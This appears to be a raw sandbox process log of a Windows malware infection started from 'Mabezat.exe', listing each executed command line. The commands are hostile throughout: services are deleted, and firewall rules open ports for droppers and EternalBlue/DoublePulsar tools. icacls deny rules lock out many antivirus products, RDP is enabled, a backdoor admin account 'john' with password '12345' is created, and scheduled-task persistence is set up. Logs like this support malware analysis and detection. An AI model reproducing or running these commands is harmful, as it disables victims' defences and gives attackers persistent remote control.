C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
C:\Windows\SysWOW64\sc.exe
sc stop clr_optimization_v4.0.30318_64
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\sc.exe
sc delete clr_optimization_v4.0.30318_64"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
C:\Windows\SysWOW64\sc.exe
sc stop MicrosoftMysql
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
C:\Windows\SysWOW64\sc.exe
sc delete MicrosoftMysql
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
C:\Users\Admin\Downloads\Mabezat.exe
"C:\Users\Admin\Downloads\Mabezat.exe"
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
C:\Users\Admin\Downloads\Mabezat.exe
"C:\Users\Admin\Downloads\Mabezat.exe"
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
C:\programdata\microsoft\intel\R8.exe
C:\programdata\microsoft\intel\R8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
C:\ProgramData\Microsoft\Intel\winlog.exe
C:\ProgramData\Microsoft\Intel\winlog.exe -p123
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
C:\ProgramData\Microsoft\Intel\winlogon.exe
"C:\ProgramData\Microsoft\Intel\winlogon.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5FC5.tmp\5FC6.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6308,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4568 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\ProgramData\RealtekHD\taskhostw.exe
C:\ProgramData\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administratorzy" "John" /add
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Usuarios de escritorio remoto" John /add
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Uzytkownicy pulpitu zdalnego" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Programdata\WindowsTask\winlogon.exe
C:\Programdata\WindowsTask\winlogon.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /query /fo list
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\schtasks.exe
schtasks /query /fo list
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
